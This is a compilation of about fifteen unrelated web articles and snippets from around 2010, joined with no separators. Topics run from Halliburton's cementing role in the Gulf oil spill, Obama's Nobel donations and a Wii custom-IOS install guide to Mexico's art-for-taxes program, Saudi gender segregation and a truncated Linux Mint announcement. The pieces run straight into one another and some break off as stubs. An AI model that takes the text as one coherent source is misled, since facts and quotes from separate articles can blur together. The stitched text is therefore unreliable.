Investigators delving into the causes of the massive gulf oil spill are examining the role of Houston - based Halliburton Co. , the giant energy services company that was responsible for cementing the deepwater drill hole , as well as the possible failure of equipment leased to British Petroleum .
Two members of Congress , Reps. Henry A. Waxman ( D - Beverly Hills ) and Bart Stupak ( D - Mich . ) , called on Halliburton on Friday to provide all documents relating to “ the possibility or risk of an explosion or blowout at the Deepwater Horizon rig and the status , adequacy , quality , monitoring , and inspection of the cementing work ” by May 7 .
Halliburton Chief Executive David Lesar is scheduled to testify before Waxman ’s energy and commerce committee on May 12 , along with top executives Lamar McKay of BP America Inc. and Steve Newman of Transocean Ltd. , which leased the drilling rig to BP .
In a statement Friday , Halliburton said : “ It is premature and irresponsible to speculate on any specific causal issues . …
The cement slurry design was consistent with that utilized in other similar applications … [ and ] tests demonstrating the integrity of the production casing string were completed . ”
After an exploration well is drilled , cement slurry is pumped through a steel pipe or casing and out through a check valve at the bottom of the casing .
It then travels up the outside of the pipe , sheathing the part of the pipe surrounded by the oil and gas zone .
When the cement hardens , it is supposed to prevent oil or gas from leaking into adjacent zones along the pipe .
As the cement sets , the check valve at the end of the casing prevents any material from flowing back up the pipe .
The zone is thus isolated until the company is ready to start production .
The process is tricky .
A 2007 study by the U.S. Minerals Management Service found that cementing was the single most - important factor in 18 of 39 well blowouts in the Gulf of Mexico over a 14 - year period .
Halliburton has been accused of performing a poor cement job in the case of a major blowout in the Timor Sea off Australia last August .
An investigation is underway .
In its statement , the company said : “ Halliburton originated oilfield cementing and leads the world in effective , efficient delivery of zonal isolation and engineering for the life of the well , conducting thousands of successful well - cementing jobs each year . ”
The company had four employees stationed on the rig at the time of the gulf accident , all of whom were rescued by the Coast Guard .
It had completed the final cementing of the well and pipe 20 hours before the blowout April 20 .
But at the time of the accident , “ well operations had not yet reached the point requiring the placement of the final cement plug , which would enable the planned temporary abandonment of the well , ” the Halliburton statement said .
Experts were cautious about attributing blame , pending what are expected to be lengthy investigations by Congress and the Department of Homeland Security , which oversees the Coast Guard .
“ What we do know is that highly pressurized oil is coming out of the wellhead with no control possible at this time , ” said Richard Charter , a drilling expert with the Defenders of Wildlife .
“ For that to happen , at least three redundant fail - safe mechanisms on and below the rig had to either fail to operate or not have been properly installed . ”
Charter said a piece of equipment known as the blowout preventer is required to shut automatically , according to regulations by the Minerals Management Service .
“ And it obviously did not , ” he said .
Moreover , he added , a manual acoustic shutoff switch could have stanched the flow but may not have been available .
Joe Leimkuhler , past president of the American Assn. of Drilling Engineers , said it was difficult to speculate about the role of cementing in the accident .
“ The process to place the cement in the well is very similar from job to job , but the details that make up the risk and challenges are specific to each well .
You really need the details of the well design and the formation characteristics . ”
He added that only the companies involved have that information .
Some speculation has centered on methane pockets frozen into crystallized formations beneath the seabed that could be warmed by the cementing process and become unstable .
A 2009 Halliburton presentation to the drilling engineers association described the challenges of methane hydrates , asking : “ When do hydrates become unstable ? ” and “ Will cement hydration cause this outcome ? ”
The presentation noted that “ gas release is a challenge for safety and economics . ”
A company spokesman declined to comment on whether methane hydrates , warmed by cement curing , may have been a factor in the gulf explosion .
More than two dozen class - action lawsuits have been filed against BP , Transocean and Halliburton .
BP spokeswoman Sheila Williams said the company was “ taking full responsibility ” for the spill and would pay for legitimate claims by affected parties .
margot.roosevelt@latimes.com
WASHINGTON — President Barack Obama plans to donate the $ 1.4 million from his Nobel Peace Prize to helping students , veterans ' families and survivors of Haiti 's earthquake , among others , drawing attention to organizations he said " do extraordinary work . "
Obama is giving a total of $ 750,000 to six groups that help kids go to college .
Fisher House , which provides housing for families with loved ones at Veterans Administration hospitals , will receive $ 250,000 , the White House said Thursday .
And the Clinton - Bush Haiti Fund , for which two former presidents are raising money to rebuild earthquake - ravaged Haiti , will receive $ 200,000 .
" These organizations do extraordinary work in the United States and abroad helping students , veterans and countless others in need , " Obama said in a statement .
" I 'm proud to support their work . "
Obama was chosen for the Nobel award more for his aspirations and approach than his accomplishments thus far .
The Nobel committee honored him for changing the tenor of international politics and for pursuing goals Obama says will require worldwide effort , such as nuclear disarmament and reversing global warming .
Obama himself was surprised by the award , and aides said at the time he would donate the cash prize to charity .
The Fisher House donation would help pay for three new homes at Bethesda Naval Hospital and Dover Air Force Base , where the bodies of Americans killed overseas are flown .
" It 's work that needs to be done for these men and women who have served this nation so gallantly , " Fisher House Foundation Chairman and CEO Kenneth Fisher said in an interview with The Associated Press .
" It 's a privilege to serve these men and women and these families because they give so much to this nation . "
The funds for Haiti would go to the rebuilding effort led by former Presidents Bill Clinton and George W. Bush .
A Jan. 12 earthquake wrecked Haiti and killed an estimated 200,000 people , and the U.S. is playing an active role in rebuilding the country .
In addition , Obama plans to give $ 125,000 apiece to groups that help students go to college : College Summit , a national nonprofit that works with elementary and middle school students to boost college enrollment rates ; the Posse Foundation , which gives full college scholarships to public school students who might be overlooked by traditional scholarship programs ; United Negro College Fund ; the Hispanic Scholarship Fund ; the Appalachian Leadership and Education Foundation ; and the American Indian College Fund .
And Obama is donating $ 100,000 to AfriCare , which funds HIV / AIDS programs , public health programs , water resource development and agriculture in 25 countries in sub-Saharan Africa .
He will give $ 100,000 to the Central Asia Institute , which promotes education for girls in Pakistan and Afghanistan .
Obama accepted his peace prize just days after announcing he was ramping up U.S. involvement in the war in Afghanistan .
( This version CORRECTS name of charity to Fisher House . )
© Copyright 2010 Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten , or redistributed .
Scientists at the Naval Research Laboratory have solved a long - standing dilemma about the mass of infrared bright merging galaxies .
Because galaxies are the largest directly observable objects in the universe , learning more about their formation is key to understanding how the universe works .
Dr. Barry Rothberg and Dr. Jacqueline Fischer , both of the Infrared - Submillimeter Astrophysics & Techniques Section in the Remote Sensing Division , used new data from the 8 - meter Gemini - South telescope in Chile along with earlier results from the W. M. Keck - 2 10 - meter and University of Hawaii 2.2 - meter telescopes in Hawaii and archival data from the Hubble Space Telescope , to solve the problem .
They have published a paper on their research findings on galaxy evolution in the Astrophysical Journal .
Galaxies in the Universe generally come in two shapes , spiral , like our own Milky Way , and elliptical , in which the stars move in random orbits , Rothberg explains .
The largest galaxies in the Universe are elliptical in shape and how they formed is central to our understanding how the Universe has evolved over the last 15 billion years .
The long - standing theory has been that spiral galaxies merge with each other forming most of the elliptical galaxies in the Universe .
Spiral galaxies contain significant amounts of cold hydrogen gas .
When they merge , the beautiful spiral patterns are destroyed and the gas is converted into new stars .
The more gas present in the spiral galaxies , the more stars are formed and with it , large amounts of dust .
The dust is heated by the young stars and radiates energy at infrared wavelengths .
Until recently scientists thought that these infrared bright merging galaxies were not massive enough to be the precursors of most elliptical galaxies in the Universe .
The problem lay in the method of measuring their mass .
The conventional method of measuring mass in dusty IR - bright galaxies uses near - infrared light to measure the random motions of old - stars .
The larger the random motions , the more mass is present .
Using near - infrared light makes it possible to penetrate the dust and see as many of the old stars as possible .
However , a complication occurs when spiral galaxies merge , because most of their gas is funneled to the gravitational center of the system and forms a rotating disk .
This rotating disk of gas is transformed into a rotating disk of young stars that is also very bright at near - infrared wavelengths .
The rotating disk of young stars both outshines the old stars and makes it appear as if the old stars have significantly less random motion .
In contrast to this conventional method , Rothberg and Fischer instead observed the random motions of old stars at shorter wavelengths effectively using the dust to their advantage to block the light from the young stars .
Their new results showed that the old stars in merging galaxies have large random motions , which means they will eventually become very massive elliptical galaxies .
The next step for NRL researches is to directly observe the stellar disks in IR luminous mergers using three - dimensional spectroscopy .
Each pixel is a spectrum , and from this the researchers can make two - dimensional maps of stellar motion and stellar age .
This will allow them to measure the size , rotation , luminosity , mass and age of the central disk .
IOS249
Installing Waninkoko's IOS249 for use with USB Loader
Warning :
This is the old version of this page kept for posterity .
It is no longer maintained .
The new method is simpler , faster and safer to perform .
IOS249 is no longer used , but instead , d 2 x .
The new method can be found here .
Custom IOSes such as IOS249 ( aka cIOS36 , cIOS38 and cIOSx ) augment the way the Wii accesses data .
For instance , in order to access a hard drive instead of the disc , an IOS is needed to convert the function calls .
For more information about custom IOSes , see the IOSes Explained page .
READ THIS FIRST
IOS249 can actually be inserted into other slots and we are going to make use of that .
There are also different versions of IOS249 that can be installed into any of the slots and these versions are determined by the base IOS used .
For maximum compatibility and ease of updating , this tutorial now gives you the following setup :
Slot 248 - Base
56 - Compatibility with most games and slightly faster read timing .
Definitely use this for games with microphones and Wii Speak .
Slot 247 - Base
57 - Compatibility with many games .
Definitely use this with Call of Duty : Black Ops .
It is also helpful for some people for old games like Twilight Princess .
Note that the 249 slot is not actually used in our installation ( it was in previous versions of the tutorial ) .
If installed there , discs with 4.2 and 4.3 updates will still ask you to update , even if you are already there .
This makes things slightly easier .
Using these slots means that you must also do the meta.xml steps of the USB Loader instructions .
Feel free to experiment with other slots and bases .
They wo n't hurt your Wii and you can reinstall any base over any slot at any time .
What you should install first
What you need
SD Card
What to download
Waninkoko's cIOSX rev 20 via this page .
If your Wii is not connected to the Internet , you need to get NUS Downloader from this page on your PC then ( using the Pack - > WAD option and renaming the file to the specified name ) : Use it to download Title " 0000000100000038 v5661 " to get IOS56-64-v5661.wad .
Use it to download Title " 0000000100000039 v5918 " to get IOS57-64-v5918.wad .
Installation procedure
Unzip the zip file and copy the contents ( the cIOSX_rev20 b - Installer directory ) to sd:/apps
Thus , you should now have a file called sd:/apps/cIOSX_rev20b-Installer/boot.dol
If your Wii is not connected to the Internet , copy IOS56-64- v5661.wad and IOS57-64-v5918 .wad to sd:/
Mute or lower volume of your speakers ( the installer has loud music )
Insert the SD card in your Wii and start Homebrew Channel then the " cIOSX_rev20 b-Installer " app Choose IOS236 for the IOS to use for the installation
If you have a different cIOS already installed , you could choose that here instead .
If you do n't have IOS236 , then pay more attention to the " What you should install first " section above .
Push A to accept the disclaimer
We are now going to install IOS248 with base 56 using the following substeps : Select IOS56 v5661 for the base IOS version with D - pad left / right and push A Select IOS248 for the Custom IOS Installation Slot with D - pad left / right and push A With the D - pad , select network installation if you are connected to the Internet or WAD installation if not , and push A If your Wii is not connected to the Internet , you will also have to choose the SD card as the source for the WAD Let the installation complete Press any button to go back to the menu
We are now going to install IOS247 with base 57 using the following substeps : Select IOS57 v5918 for the base IOS version with D - pad left / right and push A Select IOS247 for the Custom IOS Installation Slot with D - pad left / right and push A With the D - pad , select network installation if you are connected to the Internet or WAD installation if not , and push A If your Wii is not connected to the Internet , you will also have to choose the SD card as the source for the WAD Let the installation complete Press any button to go back to the menu Press B to exit
You have installed IOS249 into the 248 and 247 slots and can now move on with other steps in the tutorial .
Updating or reinstalling IOS249
In order to update or reinstall IOS249 , just do these steps again .
Also , if you have n't done so before , perform the meta.xml steps of the USB Loader page as they are required for this IOS setup .
Something went wrong .
What do I do ?
Do n't panic .
Make a backup of your Wii with BootMii if you are scared .
Ensure you followed the instruction fully and placed files where you were told to put them .
Do not assume anything .
Some people have reported issues with network installation starting , but not completing correctly .
If your errors are occurring with network installs , try the non-network method .
FAQ
What are the other bases / IOS slots for ?
Some of them might have better compatibility on future games .
For now , base 56 and 57 are the only versions you need .
How do I reinstall a different version of IOS249 ?
Just follow the procedure again .
This method looks a lot different to the one I used before , what gives ?
This new method is simpler , easier , faster and safer .
Go here or here to see the old methods .
Is this method safe for LU64/ 65 Wiis ?
I thought they needed a special procedure .
Yes it is safe .
They used to require a special procedure which is now obsolete .
Go here to see the old method .
I am using rev 13 of IOS249 and every second game I play seems to crash during loading .
What 's wrong ?
This is a known bug with rev 13 .
Rev 14 and onwards correct the bug .
If you wish to stay with rev 13 , do not use the " Wii Menu " function on the Home menu to exit your games .
Instead , use the reset option , or hold the power buttton on the Wii Remote to restart the console between playing different games .
Super Smash Bros .
Brawl keeps crashing .
Dual layer games are buggy in rev 14 and rev 16 .
Try using rev 17 or Hermes ' IOS222/223 to reinstall and play the game .
keeps crashing .
I ca n't play Metroid Prime 3 within Metroid Prime Trilogy , even with the alternate .dol method .
Dual layer games are buggy in rev 14 and rev 16 .
Try using rev 17 or Hermes ' IOS222/223 to reinstall and play the game .
, even with the alternate .dol method .
The current rev is n't working for me , but rev 10 worked fine .
What 's up ?
You are probably using the wrong USB port .
From Rev 12 onwards , the USB drives for USB Loaders must be plugged into the USB port closer to the edge of the Wii .
Configurable USB
Loader is giving me an error stating IOS249 is a stub .
What 's wrong ?
You need to do the meta.xml steps within the Configurable USB Loader instructions
.
What 's wrong ?
What Next ?
A toothy leech found in the noses of Peruvian swimmers has called attention to an unrecognized and gruesome branch on the tree of life .
Dubbed Tyrannobdella rex , " tyrant leech king , " the pinkie - finger - sized bloodsucker has a single jaw , with teeth five times longer than those found in any other leech .
Described in a paper published April 14 in PLoS ONE , the first specimen was found by doctors in 1997 in the nose of a 6 - year - old boy in San Martin , Peru .
He had complained of headaches .
Another specimen was taken that year from a 16 - month - old boy in Ayacucho , Peru .
A decade later , a third T. rex was taken from the nose of a 9 - year - old Peruvian girl who felt a " sliding " sensation in her nose .
All had bathed frequently in Amazonian streams .
The habit of invading an orifice and feeding on mucous membranes is known as hirudiniasis , and had been seen in a variety of leech species in the Middle East , Africa and Asia .
Scientists assumed these species to be unrelated , regarding their feeding habits " only as a loathsome oddity and not a unifying character for a group of related organisms , " wrote the researchers .
But when they took a closer look at these species , the researchers noticed anatomical similarities .
Genetic comparisons supported the observation .
T. rex and the other mucous - membrane feeders actually belong to a single group .
DNA differences between them , combined with known mutation rates , suggest a last common ancestor about 200 million years ago , when dinosaurs rose to Earthly dominance .
An ancestor of T. rex may have swum up the other T. rex 's nose .
Images : From PLoS ONE : 1 . Close - up of the T. rex jaw at left , and its front sucker at right .
2. Examples of other mucous - membrane–feeding leech species .
See Also :
Citation : " Tyrannobdellarex N. Gen. N. Sp. and the Evolutionary Origins of Mucosal Leech Infestations . "
By Anna J. Phillips , Renzo Arauco - Brown , Alejandro Oceguera - Figueroa , Gloria P. Gomez , Maria Beltran , Yi - Te Lai , Mark E. Siddall .
Brandon Keim's Twitter stream and reportorial outtakes ; Wired Science on Twitter .
Brandon is currently working on a book about ecological tipping points .
This not - so - cryptic hint seems to be telling us something about Rock Band 3 .
Hmm , could it be that the game will feature keyboards ?
If you download the demo of Green Day Rock Band , released on Xbox 360 and PlayStation 3 today , you 'll see this teaser screen , which indicates that vocal harmonies and keyboard gameplay are on the way for Harmonix 's next music game .
Of course , this clearly does n't tell the whole story : Harmonix has n't said publicly what the controller will look like , how the keyboard part of the game will control , and whether it'll work with its preexisting song library .
Game|Life will , however , be making a beeline for Harmonix 's E3 booth so we can report back on all of these things when the time is right .
Image : Xboxlife.dk via NeoGAF
With the skies over Britain having been almost entirely closed for two days , the British airline industry is in the grip of an unprecedented shutdown .
An estimated 500,000 people pass through British airports every day .
For the past 48 hours , almost all have seen their flights cancelled by the fallout from the Icelandic volcano .
Photos
MEXICO CITY - Can't afford to pay your income taxes ?
Paint a picture instead .
That 's the deal Mexico has offered to artists since 1957 , quietly amassing a modern art collection that would make most museum curators swoon .
While April 15 is the deadline to file taxes in the U.S. , tax collectors in Mexico are getting ready to receive a whole new crop of masterworks .
" It 's really an amazing concept , " said Jos� San Crist�bal Larrea , director of the program .
" We 're helping out artists while building a cultural inheritance for the country . "
There 's a sliding scale :
If you sell five artworks in a year , you must give the government one .
Sell 21 pieces , the government gets six .
A 10 - member jury of artists ensures that no one tries to unload junk on the government .
Thanks to the program , the Ministry of Finance and Public Credit now owns 4,248 paintings , sculptures , engravings and photographs by Diego Rivera , Rufino Tamayo , Leonora Carrington and other masters and renowned artists .
It displays these treasures in Mexican museums , hangs them in government offices and , increasingly , lends them out for special exhibitions around the world .
Others are stored in a huge , climate - controlled warehouse in Mexico City .
Forget 1040 forms - there 's nothing boring about these tax returns .
There are genitals and sex scenes , violence and political satire galore .
Clerks dutifully post each artwork on the tax - office Web site , and the agency hangs them proudly in its own museum in downtown Mexico City .
" There 's no censorship here , " said Julieta Ruiz , a curator at the museum .
If anything , the temptation to needle the taxman makes the art even edgier , she said .
Rafael Coronel 's 1980 tax payment is a wistful portrait called " He Who Does n't Pay Taxes . "
A painting that Fabian Ugalde contributed in 2002 declares in huge letters , " The authorities have still not determined whether it was an act of aggression or just another piece of art . "
A 10 - foot - high drawing by Demi�n Flores shows a man sexually assaulted by a rattlesnake , an apparent reference to the Mexican government because the rattlesnake appears on the Mexican flag .
The art program was the brainchild of two painters , muralist David Alfaro Siqueiros and Gerardo " Dr. Atl " Murillo .
In 1957 , an artist friend of theirs was about to go to jail over tax debts , so the two men approached Mexico 's tax director and talked him into an art - for - amnesty deal .
Soon , the tax office was accepting original art on a regular basis .
In 1975 , the Payment in Kind Program became an official part of the tax code .
Bill Brunson , a spokesman for the Internal Revenue Service in Phoenix , said he was unable to determine whether any similar program exists in the U.S.
Most people pay their taxes in this country with a check , credit card , money order or other " commercially acceptable " form of currency .
In Mexico , not everyone can pay with art .
Participants must register with the Tax Administration Service , Mexico 's version of the IRS , by submitting a body of their work to the jury and proving they have shown or sold artworks .
About 700 artists are registered , though not all of them pay with art every year , San Crist�bal said .
The roster includes foreigners living in Mexico , including artists Melanie Smith of Britain and Alonso Mateo of Cuba .
The artworks are collected at eight regional offices ahead of Mexico 's April 30 income - tax deadline .
Then the jury , which changes every two years , rules on the quality of the pieces .
Most past muster , but a few well - known artists have had their contributions rejected in recent years , San Crist�bal said .
He declined to name names .
The program is only for visual art , not music or literature .
Administrators may soon accept performance art as well , San Crist�bal said .
Artists would have to submit videos , photographs or other artifacts of their performance that the government could store and display , he said .
The collected artworks are divided equally among the federal government , Mexico 's state governments and its municipal governments .
Many have soared in value since the artists handed them over .
A piece by world - famous muralist Rivera that was valued at $ 50,000 in the late 1950s is now worth millions of dollars , San Crist�bal said .
By law , however , the government cannot sell any artworks from the collection .
The artworks become protected " cultural - heritage objects . "
But there is also a more practical reason :
If the government made a profit , it would have to give the artists a tax refund , San Crist�bal said .
The tax office publishes colorful catalogs of its collection and maintains a Web site where visitors can see what artists have contributed each year , along with the location of each work .
Asked which contemporary artists he would like to add to the tax office 's collection , San Crist�bal 's eyes lit up .
" Oh , I 'd love to have a Gabriel Orozco , " he said , referring to one of the country 's hottest sculpture and installation artists .
Then , he sighed .
" But Orozco lives in New York now .
He pays American taxes . "
Reach the reporter at chris.hawley@arizonarepublic.com .
Undergraduates fear that the Government 's drive to get half of young people into university will make degrees worthless and leave them struggling to get a good job after graduation , an official report revealed yesterday .
Students , who on average now graduate owing £ 21,500 , believe that they will be forced to take on more debt to study for a postgraduate qualification to make them stand out in the jobs market .
The findings will make worrying reading for ministers who have pledged to have 50 per cent of young people studying for a degree by 2010 .
John Denham , the Universities Secretary , has insisted the target will be stuck to despite conceding that the Government is now unlikely to reach it .
Download the new Independent Premium app Sharing the full story , not just the headlines
Students ' fears about their employability emerged as part of a " student listening programme " by the Department for Innovation , Universities and Skills , which held five focus groups , or " student juries " , around the country .
Their report , published yesterday , warned : " Jurors were concerned that , if the number of students participating in higher education continues to increase , having a degree may not actually increase your employability in future and that students would be forced to undertake , at more expense , postgraduate study to maintain a competitive edge with potential employers . "
Students on the London jury complained that there was a shortage of good graduate jobs and that the Government 's drive to increase student numbers would only make the situation worse .
" What are the chances of me getting a good job and what is the worth of my degree in the job market ? " asked one person .
Students also told the Manchester jury that the increasing numbers were " having a negative effect " on teaching quality and student services as university budgets became more stretched .
" Many classes are large and impersonal , " said one student .
Another said : " This target that the Government has to get 50 per cent of students into higher education is putting too much pressure on my university and I think the quality of teaching is getting worse as they have to employ greater numbers of staff . "
However , students in Sheffield said that the best part of their undergraduate experience had been the opportunity to improve their career prospects .
A spokesman for the Department for Innovation , Universities and Skills ( DIUS ) , said that getting a degree made financial sense as university graduates enjoyed a £ 100,000 premium over school leavers during their working lives .
Daily coronavirus briefing
No hype , just the advice and analysis you need Enter your email address Continue Continue Please enter an email address Email address is invalid Fill out this field Email address is invalid Email already exists .
Log in to update your newsletter preferences
Register with your social account or click here to log in I would like to receive morning headlines Monday - Friday plus breaking news alerts by email Update newsletter preferences
" Higher education remains one of the best ways to ensure a fulfilling and successful career , as well as a brighter financial future , " the spokesman said .
" Unemployment amongst university leavers remains very low as employers continue to appreciate the highly developed skills and talents that all graduates bring to their businesses .
Graduates can expect to earn considerably more over their careers than those workers without a degree .
The average graduate earns comfortably over £ 100,000 net of tax more , in today 's valuation , compared to someone who just has A - levels . "
Wes Streeting , president - elect of the National Union of Students , welcomed the Government 's consultation of students but warned that students needed better support and guidance about institutions and courses .
He said : " We are pleased that the Government is listening to students through exercises such as these , and we hope that DIUS and the higher education sector act on the issues raised by those students who took part . "
Ian Merricks , 29 : ' It was more important to experience business '
Ian Merricks decided not to go to university and instead started work aged 18 as a freelance music promoter .
Since then he has forged a successful career in the media , and owns a publishing company producing guides for young people ...
" When I was looking at going to university it seemed to me that it could be prohibitively expensive .
While I had been doing my A - levels I had been working part - time as a music promoter then when I finished college the record label offered me a full - time job .
" I thought I 'd spend a year as a freelance giving it a go and if it did n't work out I would treat it as a gap year and a useful experience .
By the end of the year I employed a couple of staff , had my own office and was running a successful music promotion business .
" My view is that I do n't think any of the opportunities I have had have been as a result or not or going to university .
It would have been fun to go but in terms of what I wanted to do in media , music and marketing I did not really need a degree .
It 's been more important for me to get experience of different types of business . "
James Baldwin- Webb , 26 : ' If I had n't gone , I 'd be in a more senior role by now '
James Baldwin - Webb achieved a 2:1 degree in molecular biology at Kent University in 2003 and hoped to pursue a career in cancer research .
Today he has student debts of £ 10,000 , works in advertising and believes that he would have been better off if he had gone straight into work ...
" I largely think that doing that particular degree was a waste of time .
I enjoyed doing it but when I graduated it was impossible to get the sort of job I wanted because although I had a degree I did n't have the experience they wanted .
Then I found that I actually enjoyed elements of the part - time job that I had in a computer games shop more than I enjoyed being in the lab .
I found I was really good at selling to customers and at getting them what they wanted .
I liked that interaction much more than doing lab work .
I think there 's a lot of pressure on people to go to university when it might not be the best choice for everyone .
If I had n't gone to university I 'd be three years further on in my current career and would be in a more senior role by now .
I do n't think I learnt any skills at university that have helped me in my career .
I 'm sure that my thinking was refined during my time at university but I think that would have happened just as well through training in the workplace . "
London , England ( CNN ) --
A new type of tidal turbine which its creators describe as an " underwater kite " has taken a step closer to becoming commercially available .
" Deep Green , " developed by Swedish start - up Minesto , has just secured € 2 million ( $ 2.5 million ) from investors to fund testing scheduled to start in 2011 .
The technology comprises of a turbine attached to a wing and rudder which is tethered to the ocean floor by 100 meters of cable .
Anchoring " Deep Green " and steering the tethered " kite " enables the turbine to capture energy from the tidal currents at ten times the speed of the actual stream velocity , say Minesto .
When operational , the turbine is expected to generate 500 kilowatts of power .
One of the big advantages of their technology , Minesto executives say , is its small size -- 12 meters for the wingspan and one meter for the turbine -- relative to other tidal - energy designs .
According to Minesto's chief technical officer , Ted Rosendahl , this means that " Deep Green " can operate efficiently at sites with low current velocities and also at greater depths , allowing tidal energy to be implemented in new stretches of sea water .
The company hope to begin trials of a scale model in 2011 at Strangford Lough , in County Down , Northern Ireland -- which is already home to a commercial tidal power device operated by UK renewable energy company , SeaGen .
Rosendahl is confident that a commercial model of " Deep Green " will be available within four years but he says obstacles still remain .
" We are in the development stage at the moment so there are many things to look into .
Of course there are things in the environment that we do n't know about fully yet , " Rosendahl told CNN .
Minesto was founded in 2007 and the project began back in 2003 as a spin - off from experiments at the auto and aircraft manufacturer Saab .
There are currently a variety of tidal energy systems on trial around the world , but according to the Energy Systems Research Unit at the UK's University of Strathclyde there are just two main methods employed .
One is tidal barrages , which use technology similar to that found in hydropower stations , while tidal stream systems -- like Minesto's " Deep Green " -- use the motion of the tide and work in a similar way to wind power generation .
Luke Blunden , a researcher at the Sustainable Energy Research Group at the UK's University of Southampton , is optimistic about tidal power 's prospects .
" Tidal energy has the winning feature of being predictable -- in time particularly -- which makes it inherently more valuable , " Blunden told CNN .
" Although it is more expensive , I think its reliability will win out in the end .
It 's not a [ total ] solution , but it will be part of the energy mix . "
Create client - side diagrammatic interaction in Web applications with SVG
Set up an example of Web - based SVG co-operation
From the developerWorks archives
Cameron Laird
|
The maturity of SVG allows for a little - known style of use and development of currently undocumented visual elements .
In a time when data - as - a - service is blossoming , it makes a lot of sense to script SVG instances from an enclosing Web application .
A specific example of a dynamic choropleth illustrates how easy this technique can be .
This content is no longer being updated or maintained .
The full article is provided " as is " in a PDF file .
Given the rapid evolution of technology , some content , steps , or illustrations may have changed .
View PDF file
If you 're like me , you 're going to be pretty disappointed when the tractor fighters dismount and the whole thing turns into more of a bells - on - straps fight than a tractor fight .
Do n't worry : the tractors come back into play .
In a big way .
So ... he was a merciful tractor fighter all along .
Yet sometimes mercy can be more shocking than brutality .
Particularly when it involves farm machinery .
( Thanks , M.F. )
When a venerable Saudi cleric in the holy city of Mecca challenges a central pillar of Saudi society , it is big news .
That was the case when Sheikh Ahmed al - Ghamdi recently declared that nothing in Islam bans men and women from mixing in public places like schools and offices .
Supporters of the status quo responded harshly .
Anyone who permits men and women to work or study together is an apostate and should be put to death unless he repents , said Sheikh Abdulrahman al - Barrak .
Does Sheikh Barrak mean that King Abdullah bin Abdul Aziz should be executed ?
Because it is the monarch who launched the country 's first coeducational university .
Barrak has not answered that question .
His website is now blocked by government censors .
Saudi religious scholars for the first time in decades are openly debating a previously untouchable hallmark of Saudi society : its strictly enforced gender segregation .
The debate reflects the more open atmosphere that has emerged under King Abdullah .
Open - minded clerics and lay people have felt emboldened to challenge hard - liners .
The scholarly disputes over mixing also underscore a message King Abdullah has been implicitly sending his subjects : that some outdated social strictures – especially when it comes to women – will need revising if the kingdom is to develop into a modern , diversified economy less dependent on oil .
Drag on progress
Saudi society 's " institutionalized segregation " is a huge drag on that transformation , says Hatoon Ajwad al - Fassi , a professor of history at King Saud University .
" It is one of the major obstacles in normalizing our lives , and it 's affected our work and our education ... [ and ] quality of life . "
Saudi Arabia has the world 's most stringent gender segregation .
Men and women enter government offices and banks through different doors .
Male professors teach female university students from separate rooms using closed - circuit television .
Companies must create all - female rooms or floors if they hire women .
And the Jeddah Chamber of Commerce just announced different work hours for male and female employees so the two do n't mix on arrival and departure .
Many Saudi women say this segregation is ordained by Islam and accept it .
Others chafe .
" Gender apartheid is the best word to describe the situation in Saudi Arabia , " wrote blogger Eman al - Nafjan .
The ban on public mixing is rooted in tribal customs but became institutionalized as the country urbanized .
Clerics claimed that Islam requires it – a debatable position since no other Muslim country has similar practices .
Like all Saudi rulers , King Abdullah derives his political legitimacy from religion and wants to maintain the loyalty of the clerical establishment .
But he has telegraphed that conservatives wo n't be allowed to hold back reforms .
When it comes to women , the king has chipped at the edges of restrictive traditions .
He has taken women on foreign trips , had his photo taken with them , and expanded opportunities for females to attend university .
" King Abdullah has a strategy :
He 's trying to empower women as much as he can , " says Fawziah al - Bakr , a King Saud University professor .
Coed , independent graduate school
In September , the king inaugurated the King Abdullah University for Science and Technology ( KAUST ) , a graduate - level school devoted to advanced scientific research .
To attract foreign faculty and students , the king decreed that it would be coed and independent of the state educational system .
A few weeks later , a young religious scholar who sits on the top - level Senior Ulema Council ( a group of religious scholars that consults with the monarch ) said in a television interview that men and women should not study together at KAUST and that its curriculum should be supervised by clerics .
The scholar , Sheikh Saad al - Shethri , was promptly removed from the council by the king .
Sheikh Ghamdi's two - page interview in Okaz newspaper came next .
Public mixing is a natural part of life and was customary during the prophet Muhammad 's time , Ghamdi told the paper .
He suggested that those who preach otherwise are hypocritical because they undoubtedly have female servants at home , so they are " contradicting " themselves .
Ghamdi's comments made a big splash because he heads the Mecca chapter of the religious police , the Commission for the Promotion of Virtue and Prevention of Vice .
A prime task of the commission is patrolling public places to make sure men and women are not mingling .
Barrak responded that the death penalty applies .
He added that anyone who allows his daughter , sister , or wife to work with men or attend mixed - gender schools is guilty of " a type of pimping . "
Some online comments also have decried Ghamdi's stance .
" It 's so pathetic to hear this come out from a Muslim scholar , " wrote one man on the Al Arabiya website .
" Segregation of sexes is the soul of the social fabric of Islam . "
Professor Fassi is not surprised at such comments .
" You will have big resistance [ because ] a part of society is not happy with ... the fact that some [ clerics ] are telling the people that we were wrong and there is nothing wrong with mixing . "
Professor
Bakr says she has been encouraged by the recent debates because in the past , eliminating the ban on public mixing had been " unthinkable .
Now , they are trying to make it thinkable .
Not do - able at this stage .
Just thinkable . "
( Wondering how frequent offshore drilling spills are ?
The Norwegians keep a database named SINTEF of all offshore blowouts from oil and gas exploration for the U.S. , and the Norwegian and U.K. North Sea , showing that they 're less frequent than they once were .
Google that analysis , or go here to see some of the worst blowouts in history . )
The environmental community should give up its usual opposition to federal money for drilling research and instead try to change drilling itself .
First , get more funding for research into how to safely get more oil and gas out of old wells in parts of the country that are already heavily drilled .
One in six barrels of oil produced in the U.S. is from such old wells , but the feds spend only $ 1 million a year investigating how to increase that yield .
For comparison , we spent more than $ 1 billion on gasoline yesterday .
Another opportunity to change the way drilling is done would be to put more money into figuring out how to extract unconventional natural gas with less water , safer drilling muds , and better fracking fluids .
Instead of choking off funding , perhaps we should embark on a five - year plan with the industry to substantially reduce the environmental impact of such drilling .
At the moment , such initiatives receive very little funding .
( Though the EPA also has a program . )
Cynics are likely to argue that investing in oil and gas technology helps the oil industry more than the environment .
But with many years of fossil fuel dependency ahead of us , we need to have higher expectations of the industry .
Investing in the right kind of research is one way to establish those expectations .
Plus , the strongest argument against coal , nuclear power , and LNG terminals has been the discovery of massive amounts of " unconventional " natural gas in the U.S. over the last ten years .
What made producing that gas possible ?
A modest $ 185 million investment in unconventional gas technology in the early 1980's , which was then modified by the gas industry itself over the years .
But simply drilling for that gas will have huge environmental effects unless we can find ways to do it better .
Thumbnail credit : David McNew / Getty Images
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
The team is proud to announce the release of Linux Mint 9 “ Isadora ” RC .
Linux Mint 9 “ Isadora ”
New features at a glance :
